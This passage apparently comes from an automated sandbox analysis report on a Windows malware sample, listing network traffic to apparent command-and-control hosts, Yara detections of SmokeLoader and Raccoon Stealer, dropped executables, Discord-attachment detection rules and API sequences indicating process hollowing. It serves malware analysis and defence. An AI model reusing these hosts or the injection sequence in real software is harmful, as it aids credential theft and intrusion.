65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Fri, 29 Oct 2021 12:11:15 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2828315
                    Connection: keep-alive
                    Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
                    ETag: "612fa893-2b281b"
                    Accept-Ranges: bytes
                Source: unknown | TCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknown | HTTP traffic detected:
                    POST / HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://hdytesri.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 202
                    Host: hajezey1.top
                Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49807 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49811 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.3:49816 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49892 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49893 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49900 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49899 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50104 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50105 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:50111 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50123 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50127 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50129 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 20.190.160.132:443 -> 192.168.2.3:50130 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50139 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50141 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                Yara detected SmokeLoader
                Source: Yara match | File source: 29.3.CBF0.exe.3080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 19.2.21.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 20.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 29.2.CBF0.exe.3070e50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 29.2.CBF0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.1.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 28.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 16.2.21.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Md0q201V1D.exe.2d815a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 19.1.21.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.2.gbhudtb.2cb15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 20.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 14.2.gbhudtb.2be15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 19.0.21.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 28.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 19.0.21.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 19.0.21.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
                Source: 21.exe, 00000010.00000002.389134308.0000000002D3A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud:

                Yara detected Raccoon Stealer
                Source: Yara match | File source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR

                System Summary:

                .NET source code contains very large array initializations
                Source: BBE1.exe.10.dr, ???????????????.cs | Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
                Source: D8D0.exe.10.dr, ue60aue64bue63aue60cue62cue60aue610ue60fue63aue63due63aue60bue61cue63cue623.cs | Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
                PE file contains section with special chars
                Source: F1AC.exe.10.dr | Static PE information: section name: Cgw(O~.
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B56AB40
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B563360
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B56A309
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B57ABD8
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B598BE8
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5F23E3
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5EEB8A
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B57EBB0
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5FFA2B
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B604AEF
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B60E2C5
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B6132A9
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B562990
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5699BF
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B578840
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B546800
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B601002
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B56A830
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B55B090
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B6067E2
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5CAE60
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B566E30
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B612EF7
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B562D50
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B611D55
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B540D20
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5735D0
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B562430
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B604496
                Source: CAC5.exe.10.dr | Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
                Source: CAC5.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CAC5.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CAC5.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CAC5.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CAC5.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: F11E.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: F11E.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
                Source: Md0q201V1D.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: 39.0.DF3A.exe.ed0000.11.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 31.0.DF3A.exe.a40000.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 24.0.B096.exe.a00000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 24.2.B096.exe.a00000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.13.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 31.0.DF3A.exe.a40000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 31.0.DF3A.exe.a40000.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 24.0.B096.exe.a00000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.9.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 27.0.BBE1.exe.790000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 27.0.BBE1.exe.790000.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 27.0.BBE1.exe.790000.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.5.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.7.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 31.0.DF3A.exe.a40000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 27.0.BBE1.exe.790000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 24.0.B096.exe.a00000.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 24.0.B096.exe.a00000.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe, type: DROPPED | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\B096.exe, type: DROPPED | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\DEDC.exe, type: DROPPED | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe, type: DROPPED | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\D8D0.exe, type: DROPPED | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\FD36.exe, type: DROPPED | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: String function: 6B59D08C appears 40 times
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: String function: 6B54B150 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: String function: 6B5D5720 appears 76 times
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_2_0040185B Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_2_00401866 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_2_0040187A Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_2_0040163B NtMapViewOfSection,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_2_004018D3 NtTerminateProcess,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_2_00401884 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_2_00401888 NtTerminateProcess,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_2_0040156A NtMapViewOfSection,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_2_004015DB NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_2_004017EA Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_1_0040156A NtMapViewOfSection,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_1_004015DB NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\Md0q201V1D.exe, Code function: 3_1_0040163B NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 14_2_02BE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_2_0040185B Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_2_00401866 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_2_0040187A Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_2_0040163B NtMapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_2_004018D3 NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_2_00401884 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_2_00401888 NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_2_0040156A NtMapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_2_004015DB NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_2_004017EA Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_1_0040156A NtMapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_1_004015DB NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\21.exe, Code function: 19_1_0040163B NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 23_2_02CB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 28_2_0040185B Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 28_2_00401866 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 28_2_0040187A Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 28_2_0040163B NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 28_2_004018D3 NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 28_2_00401884 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 28_2_00401888 NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 28_2_0040156A NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 28_2_004015DB NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\gbhudtb, Code function: 28_2_004017EA Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_0040181C Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_00402406 NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_00401F25 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_00401828 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_00402431 NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_004017DA Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_004017F8 NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_0040209A NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_004017A3 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5899A0 ZwCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589860 ZwQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589820 ZwEnumerateKey,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5898C0 ZwDuplicateObject,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589780 ZwMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58967A NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589660 ZwAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589600 ZwOpenKey,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B573B48 ZwClose,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58AB70 ZwReleaseWorkerFactoryWorker,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B542B7E ZwSetInformationThread,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B573B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5F6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58AB60 ZwReleaseKeyedEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D6365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B618B58 RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B575306 ZwReleaseKeyedEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B544B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589B00 ZwSetValueKey,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B549335 ZwClose,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B60131B RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B542BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5423F6 ZwClose,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589BF0 ZwAlertThreadByThreadId,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B55A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B542B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B601BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57939F RtlInitializeCriticalSectionEx,ZwDelayExecution,
